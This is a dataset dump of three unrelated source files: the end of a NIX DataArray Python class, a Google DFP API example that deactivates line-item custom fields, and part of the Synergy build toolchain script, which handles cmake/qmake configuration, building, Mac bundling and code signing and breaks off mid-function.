:param ticks: The ticks of the RangeDimension to create.
:type ticks: list of float
:returns: The newly created RangeDimension.
:rtype: RangeDimension
"""
dimgroup = self._h5group.open_group("dimensions")
index = len(dimgroup) + 1
return RangeDimension._create_new(dimgroup, index, ticks)
def append_alias_range_dimension(self):
"""
Append a new RangeDimension that uses the data stored in this
DataArray as ticks. This works only(!) if the DataArray is 1-D and
the stored data is numeric. A ValueError will be raised otherwise.
:returns: The created dimension descriptor.
:rtype: RangeDimension
"""
if (len(self.data_extent) > 1 or
not DataType.is_numeric_dtype(self.dtype)):
raise ValueError("AliasRangeDimensions only allowed for 1D "
"numeric DataArrays.")
if self._dimension_count() > 0:
raise ValueError("Cannot append additional alias dimension. "
"There must only be one!")
dimgroup = self._h5group.open_group("dimensions")
data = self._h5group.group["data"]
return RangeDimension._create_new(dimgroup, 1, data)
def delete_dimensions(self):
"""
Delete all the dimension descriptors for this DataArray.
"""
dimgroup = self._h5group.open_group("dimensions")
ndims = len(dimgroup)
for idx in range(ndims):
del dimgroup[str(idx+1)]
return True
def _dimension_count(self):
return len(self._h5group.open_group("dimensions"))
def _get_dimension_by_pos(self, index):
h5dim = self._h5group.open_group("dimensions").open_group(str(index))
dimtype = h5dim.get_attr("dimension_type")
if dimtype == DimensionType.Sample:
return SampledDimension(h5dim, index)
elif dimtype == DimensionType.Range:
return RangeDimension(h5dim, index)
elif dimtype == DimensionType.Set:
return SetDimension(h5dim, index)
else:
raise TypeError("Invalid Dimension object in file.")
@property
def dtype(self):
"""
The data type of the data stored in the DataArray.
This is a read only property.
:return: DataType
"""
return self._h5group.group["data"].dtype
@property
def polynom_coefficients(self):
"""
The polynomial coefficients for the calibration. By default this is
        set to {0.0, 1.0} for a linear calibration with zero offset.
        This is a read-write property and can be set to None.
:type: list of float
"""
return tuple(self._h5group.get_data("polynom_coefficients"))
@polynom_coefficients.setter
def polynom_coefficients(self, coeff):
if not coeff:
if self._h5group.has_data("polynom_coefficients"):
del self._h5group["polynom_coefficients"]
else:
dtype = DataType.Double
self._h5group.write_data("polynom_coefficients", coeff, dtype)
@property
def expansion_origin(self):
"""
The expansion origin of the calibration polynomial.
This is a read-write property and can be set to None.
The default value is 0.
:type: float
"""
return self._h5group.get_attr("expansion_origin")
@expansion_origin.setter
def expansion_origin(self, eo):
util.check_attr_type(eo, Number)
self._h5group.set_attr("expansion_origin", eo)
@property
def label(self):
"""
The label of the DataArray. The label corresponds to the label of the
x-axis of a plot. This is a read-write property and can be set to
None.
:type: str
"""
return self._h5group.get_attr("label")
@label.setter
def label(self, l):
util.check_attr_type(l, str)
self._h5group.set_attr("label", l)
@property
def unit(self):
"""
The unit of the values stored in the DataArray. This is a read-write
property and can be set to None.
:type: str
"""
return self._h5group.get_attr("unit")
@unit.setter
def unit(self, u):
util.check_attr_type(u, str)
if u is not None:
u = util.units.sanitizer(u)
if not (util.units.is_si(u) or util.units.is_compound(u)):
raise InvalidUnit(
"{} is not SI or composite of SI units".format(u),
"DataArray.unit"
)
self._h5group.set_attr("unit", u)
| bsd-3-clause | 6,309,524,489,179,583,000 | 31.913386 | 79 | 0.605742 | false |
caioserra/apiAdwords | examples/adspygoogle/dfp/v201308/custom_field_service/deactivate_all_line_item_custom_fields.py | 2 | 2861 | #!/usr/bin/python
#
# Copyright 2013 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This example deactivates all active line items custom fields.
To determine which custom fields exist, run get_all_custom_fields.py.
Tags: CustomFieldService.getCustomFieldsByStatement
Tags: CustomFieldService.performCustomFieldAction
"""
__author__ = '[email protected] (Jeff Sham)'
# Locate the client library. If module was installed via "setup.py" script, then
# the following two lines are not needed.
import os
import sys
sys.path.insert(0, os.path.join('..', '..', '..', '..', '..'))
# Import appropriate classes from the client library.
from adspygoogle import DfpClient
from adspygoogle.dfp import DfpUtils
def main(client):
# Initialize appropriate service.
custom_field_service = client.GetService(
'CustomFieldService', version='v201308')
# Create statement to select only active custom fields that apply to
# line items.
values = [
{
'key': 'entityType',
'value': {
'xsi_type': 'TextValue',
'value': 'LINE_ITEM'
}
}, {
'key': 'isActive',
'value': {
'xsi_type': 'BooleanValue',
'value': 'true'
}
}
]
query = 'WHERE entityType = :entityType and isActive = :isActive'
# Get custom fields by statement.
custom_fields = DfpUtils.GetAllEntitiesByStatementWithService(
custom_field_service, query=query, bind_vars=values)
# Display results.
for custom_field in custom_fields:
print ('Custom field with ID \'%s\' and name \'%s\' will be deactivated.'
% (custom_field['id'], custom_field['name']))
print
print 'Number of custom fields to be deactivated: %s' % len(custom_fields)
if custom_fields:
# Perform action.
result = custom_field_service.PerformCustomFieldAction(
{'type': 'DeactivateCustomFields'},
{'query': query, 'values': values})[0]
# Display results.
if result and int(result['numChanges']) > 0:
print 'Number of custom fields deactivated: %s' % result['numChanges']
else:
print 'No custom fields were deactivated.'
if __name__ == '__main__':
# Initialize client object.
dfp_client = DfpClient(path=os.path.join('..', '..', '..', '..', '..'))
main(dfp_client)
| apache-2.0 | -4,093,755,459,794,316,300 | 30.788889 | 80 | 0.664453 | false |
RobertoMalatesta/synergy | ext/toolchain/commands1.py | 22 | 55902 | # synergy -- mouse and keyboard sharing utility
# Copyright (C) 2012 Synergy Si Ltd.
# Copyright (C) 2009 Nick Bolton
#
# This package is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# found in the file LICENSE that should have accompanied this file.
#
# This package is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# TODO: split this file up, it's too long!
import sys, os, ConfigParser, shutil, re, ftputil, zipfile, glob, commands
from generators import VisualStudioGenerator, EclipseGenerator, XcodeGenerator, MakefilesGenerator
from getopt import gnu_getopt
if sys.version_info >= (2, 4):
import subprocess
class Toolchain:
# minimum required version.
# 2.6 needed for ZipFile.extractall.
# do not change to 2.7, as the build machines are still at 2.6
# and are a massive pain in the ass to upgrade.
requiredMajor = 2
requiredMinor = 6
# options used by all commands
globalOptions = 'v'
globalOptionsLong = ['no-prompts', 'verbose', 'skip-gui', 'skip-core']
# list of valid commands as keys. the values are optarg strings, but most
# are None for now (this is mainly for extensibility)
cmd_opt_dict = {
'about' : ['', []],
'setup' : ['g:', ['generator=']],
'configure' : ['g:dr', ['generator=', 'debug', 'release', 'mac-sdk=', 'mac-identity=']],
'build' : ['dr', ['debug', 'release']],
'clean' : ['dr', ['debug', 'release']],
'update' : ['', []],
'install' : ['', []],
'doxygen' : ['', []],
'dist' : ['', ['vcredist-dir=', 'qt-dir=']],
'distftp' : ['', ['host=', 'user=', 'pass=', 'dir=']],
'kill' : ['', []],
'usage' : ['', []],
'revision' : ['', []],
'reformat' : ['', []],
'open' : ['', []],
'genlist' : ['', []],
'reset' : ['', []],
'signwin' : ['', ['pfx=', 'pwd=', 'dist']],
'signmac' : ['', []]
}
# aliases to valid commands
cmd_alias_dict = {
'info' : 'about',
'help' : 'usage',
'package' : 'dist',
'docs' : 'doxygen',
'make' : 'build',
'cmake' : 'configure',
}
def complete_command(self, arg):
completions = []
for cmd, optarg in self.cmd_opt_dict.iteritems():
# if command was matched fully, return only this, so that
# if `dist` is typed, it will return only `dist` and not
# `dist` and `distftp` for example.
if cmd == arg:
return [cmd,]
if cmd.startswith(arg):
completions.append(cmd)
for alias, cmd in self.cmd_alias_dict.iteritems():
# don't know if this will work just like above, but it's
# probably worth adding.
if alias == arg:
return [alias,]
if alias.startswith(arg):
completions.append(alias)
return completions
def start_cmd(self, argv):
cmd_arg = ''
if len(argv) > 1:
cmd_arg = argv[1]
# change common help args to help command
if cmd_arg in ('--help', '-h', '--usage', '-u', '/?'):
cmd_arg = 'usage'
completions = self.complete_command(cmd_arg)
if cmd_arg and len(completions) > 0:
if len(completions) == 1:
# get the only completion (since in this case we have 1)
cmd = completions[0]
# build up the first part of the map (for illustrative purposes)
cmd_map = list()
if cmd_arg != cmd:
cmd_map.append(cmd_arg)
cmd_map.append(cmd)
# map an alias to the command, and build up the map
if cmd in self.cmd_alias_dict.keys():
alias = cmd
if cmd_arg == cmd:
cmd_map.append(alias)
cmd = self.cmd_alias_dict[cmd]
cmd_map.append(cmd)
# show command map to avoid confusion
if len(cmd_map) != 0:
print 'Mapping command: %s' % ' -> '.join(cmd_map)
self.run_cmd(cmd, argv[2:])
return 0
else:
print (
'Command `%s` too ambiguous, '
'could mean any of: %s'
) % (cmd_arg, ', '.join(completions))
else:
if len(argv) == 1:
print 'No command specified, showing usage.\n'
else:
print 'Command not recognised: %s\n' % cmd_arg
self.run_cmd('usage')
# generic error code if not returned sooner
return 1
def run_cmd(self, cmd, argv = []):
verbose = False
try:
options_pair = self.cmd_opt_dict[cmd]
options = self.globalOptions + options_pair[0]
options_long = []
options_long.extend(self.globalOptionsLong)
options_long.extend(options_pair[1])
opts, args = gnu_getopt(argv, options, options_long)
for o, a in opts:
if o in ('-v', '--verbose'):
verbose = True
# pass args and optarg data to command handler, which figures out
# how to handle the arguments
handler = CommandHandler(argv, opts, args, verbose)
# use reflection to get the function pointer
cmd_func = getattr(handler, cmd)
cmd_func()
except:
if not verbose:
# print friendly error for users
sys.stderr.write('Error: ' + sys.exc_info()[1].__str__() + '\n')
sys.exit(1)
else:
# if user wants to be verbose let python do it's thing
raise
def run(self, argv):
if sys.version_info < (self.requiredMajor, self.requiredMinor):
print ('Python version must be at least ' +
str(self.requiredMajor) + '.' + str(self.requiredMinor) + ', but is ' +
str(sys.version_info[0]) + '.' + str(sys.version_info[1]))
sys.exit(1)
try:
self.start_cmd(argv)
except KeyboardInterrupt:
print '\n\nUser aborted, exiting.'
class InternalCommands:
project = 'synergy'
setup_version = 5 # increment to force setup/config
website_url = 'http://synergy-project.org/'
this_cmd = 'hm'
cmake_cmd = 'cmake'
qmake_cmd = 'qmake'
make_cmd = 'make'
xcodebuild_cmd = 'xcodebuild'
w32_make_cmd = 'mingw32-make'
w32_qt_version = '4.6.2'
defaultTarget = 'release'
cmake_dir = 'res'
gui_dir = 'src/gui'
doc_dir = 'doc'
extDir = 'ext'
sln_filename = '%s.sln' % project
xcodeproj_filename = '%s.xcodeproj' % project
configDir = 'build'
configFilename = '%s/%s.cfg' % (configDir, this_cmd)
qtpro_filename = 'gui.pro'
doxygen_filename = 'doxygen.cfg'
cmake_url = 'http://www.cmake.org/cmake/resources/software.html'
# try_chdir(...) and restore_chdir() will use this
prevdir = ''
# by default, no index specified as arg
generator_id = None
# by default, prompt user for input
no_prompts = False
# by default, compile the core
enableMakeCore = True
# by default, compile the gui
enableMakeGui = True
# by default, unknown
macSdk = None
# by default, unknown
macIdentity = None
# gtest dir with version number
gtestDir = 'gtest-1.6.0'
# gmock dir with version number
gmockDir = 'gmock-1.6.0'
win32_generators = {
1 : VisualStudioGenerator('10'),
2 : VisualStudioGenerator('10 Win64'),
3 : VisualStudioGenerator('9 2008'),
4 : VisualStudioGenerator('9 2008 Win64'),
5 : VisualStudioGenerator('8 2005'),
6 : VisualStudioGenerator('8 2005 Win64')
}
unix_generators = {
1 : MakefilesGenerator(),
2 : EclipseGenerator(),
}
darwin_generators = {
1 : MakefilesGenerator(),
2 : XcodeGenerator(),
3 : EclipseGenerator(),
}
def getBuildDir(self, target=''):
return self.getGenerator().getBuildDir(target)
def getBinDir(self, target=''):
return self.getGenerator().getBinDir(target)
def sln_filepath(self):
return '%s\%s' % (self.getBuildDir(), self.sln_filename)
def xcodeproj_filepath(self, target=''):
return '%s/%s' % (self.getBuildDir(target), self.xcodeproj_filename)
def usage(self):
app = sys.argv[0]
print ('Usage: %s <command> [-g <index>|-v|--no-prompts|<command-options>]\n'
'\n'
'Replace [command] with one of:\n'
' about Show information about this script\n'
' setup Runs the initial setup for this script\n'
' conf Runs cmake (generates project files)\n'
' open Attempts to open the generated project file\n'
' build Builds using the platform build chain\n'
' clean Cleans using the platform build chain\n'
' kill Kills all synergy processes (run as admin)\n'
' update Updates the source code from repository\n'
' revision Display the current source code revision\n'
' package Create a distribution package (e.g. tar.gz)\n'
' install Installs the program\n'
' doxygen Builds doxygen documentation\n'
' reformat Reformat .cpp and .h files using AStyle\n'
' genlist Shows the list of available platform generators\n'
' usage Shows the help screen\n'
'\n'
'Example: %s build -g 3'
) % (app, app)
def configureAll(self, targets, extraArgs=''):
# if no mode specified, use default
if len(targets) == 0:
targets += [self.defaultTarget,]
for target in targets:
self.configure(target)
def checkGTest(self):
dir = self.extDir + '/' + self.gtestDir
if (os.path.isdir(dir)):
return
zipFilename = dir + '.zip'
if (not os.path.exists(zipFilename)):
raise Exception('GTest zip not found at: ' + zipFilename)
if not os.path.exists(dir):
os.mkdir(dir)
zip = zipfile.ZipFile(zipFilename)
self.zipExtractAll(zip, dir)
def checkGMock(self):
dir = self.extDir + '/' + self.gmockDir
if (os.path.isdir(dir)):
return
zipFilename = dir + '.zip'
if (not os.path.exists(zipFilename)):
raise Exception('GMock zip not found at: ' + zipFilename)
if not os.path.exists(dir):
os.mkdir(dir)
zip = zipfile.ZipFile(zipFilename)
self.zipExtractAll(zip, dir)
# ZipFile.extractall() is buggy in 2.6.1
# http://bugs.python.org/issue4710
def zipExtractAll(self, z, dir):
if not dir.endswith("/"):
dir += "/"
for f in z.namelist():
if f.endswith("/"):
os.makedirs(dir + f)
else:
z.extract(f, dir)
def configure(self, target='', extraArgs=''):
# ensure latest setup and do not ask config for generator (only fall
# back to prompt if not specified as arg)
self.ensure_setup_latest()
if sys.platform == "darwin":
config = self.getConfig()
if self.macSdk:
config.set('hm', 'macSdk', self.macSdk)
elif config.has_option("hm", "macSdk"):
self.macSdk = config.get('hm', 'macSdk')
if self.macIdentity:
config.set('hm', 'macIdentity', self.macIdentity)
elif config.has_option("hm", "macIdentity"):
self.macIdentity = config.get('hm', 'macIdentity')
self.write_config(config)
if not self.macSdk:
raise Exception("Arg missing: --mac-sdk <version>");
if not self.macIdentity:
raise Exception("Arg missing: --mac-identity <name>");
sdkDir = self.getMacSdkDir()
if not os.path.exists(sdkDir):
raise Exception("Mac SDK not found at: " + sdkDir)
os.environ["MACOSX_DEPLOYMENT_TARGET"] = self.macSdk
# default is release
if target == '':
print 'Defaulting target to: ' + self.defaultTarget
target = self.defaultTarget
# allow user to skip core compile
if self.enableMakeCore:
self.configureCore(target, extraArgs)
# allow user to skip gui compile
if self.enableMakeGui:
self.configureGui(target, extraArgs)
self.setConfRun(target)
def configureCore(self, target="", extraArgs=""):
# ensure that we have access to cmake
_cmake_cmd = self.persist_cmake()
# now that we know we've got the latest setup, we can ask the config
# file for the generator (but again, we only fall back to this if not
# specified as arg).
generator = self.getGenerator()
if generator != self.findGeneratorFromConfig():
print('Generator changed, running setup.')
self.setup(target)
cmake_args = ''
if generator.cmakeName != '':
cmake_args += ' -G "' + generator.cmakeName + '"'
# for makefiles always specify a build type (debug, release, etc)
if generator.cmakeName.find('Unix Makefiles') != -1:
cmake_args += ' -DCMAKE_BUILD_TYPE=' + target.capitalize()
elif sys.platform == "darwin":
macSdkMatch = re.match("(\d+)\.(\d+)", self.macSdk)
if not macSdkMatch:
raise Exception("unknown osx version: " + self.macSdk)
sdkDir = self.getMacSdkDir()
cmake_args += " -DCMAKE_OSX_SYSROOT=" + sdkDir
cmake_args += " -DCMAKE_OSX_DEPLOYMENT_TARGET=" + self.macSdk
cmake_args += " -DOSX_TARGET_MAJOR=" + macSdkMatch.group(1)
cmake_args += " -DOSX_TARGET_MINOR=" + macSdkMatch.group(2)
# if not visual studio, use parent dir
sourceDir = generator.getSourceDir()
self.checkGTest()
self.checkGMock()
if extraArgs != '':
cmake_args += ' ' + extraArgs
cmake_cmd_string = _cmake_cmd + cmake_args + ' ' + sourceDir
# Run from build dir so we have an out-of-source build.
self.try_chdir(self.getBuildDir(target))
print "CMake command: " + cmake_cmd_string
err = os.system(cmake_cmd_string)
self.restore_chdir()
if generator.cmakeName.find('Eclipse') != -1:
self.fixCmakeEclipseBug()
if err != 0:
raise Exception('CMake encountered error: ' + str(err))
def configureGui(self, target="", extraArgs=""):
# make sure we have qmake
self.persist_qmake()
qmake_cmd_string = self.qmake_cmd + " " + self.qtpro_filename + " -r"
if sys.platform == "darwin":
# create makefiles on mac (not xcode).
qmake_cmd_string += " -spec macx-g++"
(major, minor) = self.getMacVersion()
if major == 10 and minor <= 4:
# 10.4: universal (intel and power pc)
qmake_cmd_string += ' CONFIG+="ppc i386"'
libs = (
"-framework ApplicationServices "
"-framework Security "
"-framework cocoa")
if major == 10 and minor >= 6:
libs += " -framework ServiceManagement"
qmake_cmd_string += " \"MACX_LIBS=%s\" " % libs
sdkDir = self.getMacSdkDir()
shortForm = "macosx" + self.macSdk
version = str(major) + "." + str(minor)
qmake_cmd_string += " QMAKE_MACOSX_DEPLOYMENT_TARGET=" + version
(qMajor, qMinor, qRev) = self.getQmakeVersion()
if qMajor <= 4:
# 4.6: qmake takes full sdk dir.
qmake_cmd_string += " QMAKE_MAC_SDK=" + sdkDir
else:
# 5.2: now we need to use the .path setting.
qmake_cmd_string += " QMAKE_MAC_SDK=" + shortForm
qmake_cmd_string += " QMAKE_MAC_SDK." + shortForm + ".path=" + sdkDir
print "QMake command: " + qmake_cmd_string
# run qmake from the gui dir
self.try_chdir(self.gui_dir)
err = os.system(qmake_cmd_string)
self.restore_chdir()
if err != 0:
raise Exception('QMake encountered error: ' + str(err))
def getQmakeVersion(self):
version = commands.getoutput("qmake --version")
result = re.search('(\d+)\.(\d+)\.(\d)', version)
if not result:
raise Exception("Could not get qmake version.")
major = int(result.group(1))
minor = int(result.group(2))
rev = int(result.group(3))
return (major, minor, rev)
def getMacSdkDir(self):
sdkName = "macosx" + self.macSdk
# Ideally we'll use xcrun (which is influenced by $DEVELOPER_DIR), then try a couple
# fallbacks to known paths if xcrun is not available
status, sdkPath = commands.getstatusoutput("xcrun --show-sdk-path --sdk " + sdkName)
if status == 0 and sdkPath:
return sdkPath
developerDir = os.getenv("DEVELOPER_DIR")
if not developerDir:
developerDir = "/Applications/Xcode.app/Contents/Developer"
sdkDirName = sdkName.replace("macosx", "MacOSX")
sdkPath = developerDir + "/Platforms/MacOSX.platform/Developer/SDKs/" + sdkDirName + ".sdk"
if os.path.exists(sdkPath):
return sdkPath
return "/Developer/SDKs/" + sdkDirName + ".sdk"
# http://tinyurl.com/cs2rxxb
def fixCmakeEclipseBug(self):
print "Fixing CMake Eclipse bugs..."
file = open('.project', 'r+')
content = file.read()
pattern = re.compile('\s+<linkedResources>.+</linkedResources>', re.S)
content = pattern.sub('', content)
file.seek(0)
file.write(content)
file.truncate()
file.close()
def persist_cmake(self):
# even though we're running `cmake --version`, we're only doing this for the 0 return
		# code; we don't care about the version, since CMakeLists worries about this for us.
err = os.system('%s --version' % self.cmake_cmd)
if err != 0:
# if return code from cmake is not 0, then either something has
# gone terribly wrong with --version, or it genuinely doesn't exist.
print ('Could not find `%s` in system path.\n'
'Download the latest version from:\n %s') % (
self.cmake_cmd, self.cmake_url)
raise Exception('Cannot continue without CMake.')
else:
return self.cmake_cmd
def persist_qt(self):
self.persist_qmake()
def persist_qmake(self):
# cannot use subprocess on < python 2.4
if sys.version_info < (2, 4):
return
try:
p = subprocess.Popen(
[self.qmake_cmd, '--version'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
except:
print >> sys.stderr, 'Error: Could not find qmake.'
if sys.platform == 'win32': # windows devs usually need hints ;)
print (
'Suggestions:\n'
'1. Ensure that qmake.exe exists in your system path.\n'
'2. Try to download Qt (check our dev FAQ for links):\n'
' qt-sdk-win-opensource-2010.02.exe')
raise Exception('Cannot continue without qmake.')
stdout, stderr = p.communicate()
if p.returncode != 0:
raise Exception('Could not test for cmake: %s' % stderr)
else:
m = re.search('.*Using Qt version (\d+\.\d+\.\d+).*', stdout)
if m:
if sys.platform == 'win32':
ver = m.group(1)
if ver != self.w32_qt_version: # TODO: test properly
print >> sys.stderr, (
'Warning: Not using supported Qt version %s'
' (your version is %s).'
) % (self.w32_qt_version, ver)
else:
pass # any version should be ok for other platforms
else:
raise Exception('Could not find qmake version.')
def ensureConfHasRun(self, target, skipConfig):
if self.hasConfRun(target):
print 'Skipping config for target: ' + target
skipConfig = True
if not skipConfig:
self.configure(target)
def build(self, targets=[], skipConfig=False):
# if no mode specified, use default
if len(targets) == 0:
targets += [self.defaultTarget,]
self.ensure_setup_latest()
self.loadConfig()
# allow user to skip core compile
if self.enableMakeCore:
self.makeCore(targets)
# allow user to skip gui compile
if self.enableMakeGui:
self.makeGui(targets)
def loadConfig(self):
config = self.getConfig()
if config.has_option("hm", "macSdk"):
self.macSdk = config.get("hm", "macSdk")
if config.has_option("hm", "macIdentity"):
self.macIdentity = config.get("hm", "macIdentity")
def makeCore(self, targets):
generator = self.getGeneratorFromConfig().cmakeName
if self.macSdk:
os.environ["MACOSX_DEPLOYMENT_TARGET"] = self.macSdk
if generator.find('Unix Makefiles') != -1:
for target in targets:
self.runBuildCommand(self.make_cmd, target)
else:
for target in targets:
if generator.startswith('Visual Studio'):
self.run_vcbuild(generator, target, self.sln_filepath())
elif generator == 'Xcode':
cmd = self.xcodebuild_cmd + ' -configuration ' + target.capitalize()
self.runBuildCommand(cmd, target)
else:
raise Exception('Build command not supported with generator: ' + generator)
def makeGui(self, targets, args=""):
for target in targets:
if sys.platform == 'win32':
gui_make_cmd = self.w32_make_cmd + ' ' + target + args
print 'Make GUI command: ' + gui_make_cmd
self.try_chdir(self.gui_dir)
err = os.system(gui_make_cmd)
self.restore_chdir()
if err != 0:
raise Exception(gui_make_cmd + ' failed with error: ' + str(err))
elif sys.platform in ['linux2', 'sunos5', 'freebsd7', 'darwin']:
gui_make_cmd = self.make_cmd + " -w" + args
print 'Make GUI command: ' + gui_make_cmd
# start with a clean app bundle
targetDir = self.getGenerator().getBinDir(target)
bundleTargetDir = targetDir + '/Synergy.app'
if os.path.exists(bundleTargetDir):
shutil.rmtree(bundleTargetDir)
binDir = self.getGenerator().binDir
bundleTempDir = binDir + '/Synergy.app'
if os.path.exists(bundleTempDir):
shutil.rmtree(bundleTempDir)
self.try_chdir(self.gui_dir)
err = os.system(gui_make_cmd)
self.restore_chdir()
if err != 0:
raise Exception(gui_make_cmd + ' failed with error: ' + str(err))
if sys.platform == 'darwin' and not "clean" in args:
self.macPostGuiMake(target)
self.fixQtFrameworksLayout(target)
else:
raise Exception('Unsupported platform: ' + sys.platform)
def macPostGuiMake(self, target):
bundle = 'Synergy.app'
binDir = self.getGenerator().binDir
targetDir = self.getGenerator().getBinDir(target)
bundleTempDir = binDir + '/' + bundle
bundleTargetDir = targetDir + '/' + bundle
if os.path.exists(bundleTempDir):
shutil.move(bundleTempDir, bundleTargetDir)
if self.enableMakeCore:
# copy core binaries into the bundle, since the gui
# now looks for the binaries in the current app dir.
bundleBinDir = bundleTargetDir + "/Contents/MacOS/"
shutil.copy(targetDir + "/synergyc", bundleBinDir)
shutil.copy(targetDir + "/synergys", bundleBinDir)
shutil.copy(targetDir + "/syntool", bundleBinDir)
# Copy all generated plugins to the package
bundlePluginDir = bundleBinDir + "plugins"
pluginDir = targetDir + "/plugins"
print "Copying plugins dirtree: " + pluginDir
if os.path.isdir(pluginDir):
print "Copying to: " + bundlePluginDir
shutil.copytree(pluginDir, bundlePluginDir)
else:
print "pluginDir doesn't exist, skipping"
self.loadConfig()
if not self.macIdentity:
raise Exception("run config with --mac-identity")
if self.enableMakeGui:
# use qt to copy libs to bundle so no dependencies are needed. do not create a
# dmg at this point, since we need to sign it first, and then create our own
# after signing (so that qt does not affect the signed app bundle).
bin = "macdeployqt Synergy.app -verbose=2"
self.try_chdir(targetDir)
err = os.system(bin)
self.restore_chdir()
print bundleTargetDir
if err != 0:
raise Exception(bin + " failed with error: " + str(err))
(qMajor, qMinor, qRev) = self.getQmakeVersion()
if qMajor <= 4:
frameworkRootDir = "/Library/Frameworks"
else:
# TODO: auto-detect, qt can now be installed anywhere.
frameworkRootDir = "/Developer/Qt5.2.1/5.2.1/clang_64/lib"
target = bundleTargetDir + "/Contents/Frameworks"
# copy the missing Info.plist files for the frameworks.
for root, dirs, files in os.walk(target):
for dir in dirs:
if dir.startswith("Qt"):
shutil.copy(
frameworkRootDir + "/" + dir + "/Contents/Info.plist",
target + "/" + dir + "/Resources/")
def symlink(self, source, target):
if not os.path.exists(target):
os.symlink(source, target)
def move(self, source, target):
if os.path.exists(source):
shutil.move(source, target)
def fixQtFrameworksLayout(self, target):
# reorganize Qt frameworks layout on Mac 10.9.5 or later
# http://goo.gl/BFnQ8l
# QtCore example:
# QtCore.framework/
# QtCore -> Versions/Current/QtCore
# Resources -> Versions/Current/Resources
# Versions/
# Current -> 5
# 5/
# QtCore
# Resources/
# Info.plist
targetDir = self.getGenerator().getBinDir(target)
target = targetDir + "/Synergy.app/Contents/Frameworks"
(major, minor) = self.getMacVersion()
if major == 10:
if minor >= 9:
for root, dirs, files in os.walk(target):
for dir in dirs:
if dir.startswith("Qt"):
self.try_chdir(target + "/" + dir +"/Versions")
self.symlink("5", "Current")
self.move("../Resources", "5")
self.restore_chdir()
self.try_chdir(target + "/" + dir)
dot = dir.find('.')
frameworkName = dir[:dot]
self.symlink("Versions/Current/" + frameworkName, frameworkName)
self.symlink("Versions/Current/Resources", "Resources")
self.restore_chdir()
def signmac(self):
self.loadConfig()
if not self.macIdentity:
raise Exception("run config with --mac-identity")
self.try_chdir("bin/Release/")
err = os.system(
'codesign --deep -fs "' + self.macIdentity + '" Synergy.app')
self.restore_chdir()
if err != 0:
raise Exception("codesign failed with error: " + str(err))
def signwin(self, pfx, pwdFile, dist):
generator = self.getGeneratorFromConfig().cmakeName
if not generator.startswith('Visual Studio'):
raise Exception('only windows is supported')
f = open(pwdFile)
lines = f.readlines()
f.close()
pwd = lines[0]
if (dist):
self.signFile(pfx, pwd, 'bin/Release', self.getDistFilename('win'))
else:
self.signFile(pfx, pwd, 'bin/Release', 'synergy.exe')
self.signFile(pfx, pwd, 'bin/Release', 'synergyc.exe')
self.signFile(pfx, pwd, 'bin/Release', 'synergys.exe')
self.signFile(pfx, pwd, 'bin/Release', 'synergyd.exe')
self.signFile(pfx, pwd, 'bin/Release', 'syntool.exe')
self.signFile(pfx, pwd, 'bin/Release', 'synwinhk.dll')
def signFile(self, pfx, pwd, dir, file):
self.try_chdir(dir)
err = os.system(
'signtool sign'
' /f ' + pfx +
' /p ' + pwd +
' /t http://timestamp.verisign.com/scripts/timstamp.dll ' +
file)
self.restore_chdir()
if err != 0:
raise Exception("signtool failed with error: " + str(err))
def runBuildCommand(self, cmd, target):
self.try_chdir(self.getBuildDir(target))
err = os.system(cmd)
self.restore_chdir()
if err != 0:
raise Exception(cmd + ' failed: ' + str(err))
def clean(self, targets=[]):
# if no mode specified, use default
if len(targets) == 0:
targets += [self.defaultTarget,]
# allow user to skip core clean
if self.enableMakeCore:
self.cleanCore(targets)
		# allow user to skip gui clean
if self.enableMakeGui:
self.cleanGui(targets)
def cleanCore(self, targets):
generator = self.getGeneratorFromConfig().cmakeName
if generator.startswith('Visual Studio'):
# special case for version 10, use new /target:clean
if generator.startswith('Visual Studio 10'):
for target in targets:
self.run_vcbuild(generator, target, self.sln_filepath(), '/target:clean')
# any other version of visual studio, use /clean
elif generator.startswith('Visual Studio'):
for target in targets:
self.run_vcbuild(generator, target, self.sln_filepath(), '/clean')
else:
cmd = ''
if generator == "Unix Makefiles":
print 'Cleaning with GNU Make...'
cmd = self.make_cmd
elif generator == 'Xcode':
print 'Cleaning with Xcode...'
cmd = self.xcodebuild_cmd
else:
raise Exception('Not supported with generator: ' + generator)
for target in targets:
self.try_chdir(self.getBuildDir(target))
err = os.system(cmd + ' clean')
self.restore_chdir()
if err != 0:
raise Exception('Clean failed: ' + str(err))
def cleanGui(self, targets):
self.makeGui(targets, " clean")
def open(self):
generator = self.getGeneratorFromConfig().cmakeName
if generator.startswith('Visual Studio'):
print 'Opening with %s...' % generator
self.open_internal(self.sln_filepath())
elif generator.startswith('Xcode'):
print 'Opening with %s...' % generator
self.open_internal(self.xcodeproj_filepath(), 'open')
else:
raise Exception('Not supported with generator: ' + generator)
def update(self):
print "Running Subversion update..."
err = os.system('svn update')
if err != 0:
			raise Exception('Could not update from repository with error code: ' + str(err))
def revision(self):
print self.find_revision()
def find_revision(self):
return self.getGitRevision()
def getGitRevision(self):
if sys.version_info < (2, 4):
raise Exception("Python 2.4 or greater required.")
p = subprocess.Popen(
["git", "log", "--pretty=format:%h", "-n", "1"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
if p.returncode != 0:
raise Exception('Could not get revision, git error: ' + str(p.returncode))
return stdout.strip()
def getGitBranchName(self):
if sys.version_info < (2, 4):
raise Exception("Python 2.4 or greater required.")
p = subprocess.Popen(
["git", "rev-parse", "--abbrev-ref", "HEAD"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
if p.returncode != 0:
raise Exception('Could not get branch name, git error: ' + str(p.returncode))
result = stdout.strip()
# sometimes, git will prepend "heads/" infront of the branch name,
# remove this as it's not useful to us and causes ftp issues.
result = re.sub("heads/", "", result)
return result
def find_revision_svn(self):
if sys.version_info < (2, 4):
stdout = commands.getoutput('svn info')
else:
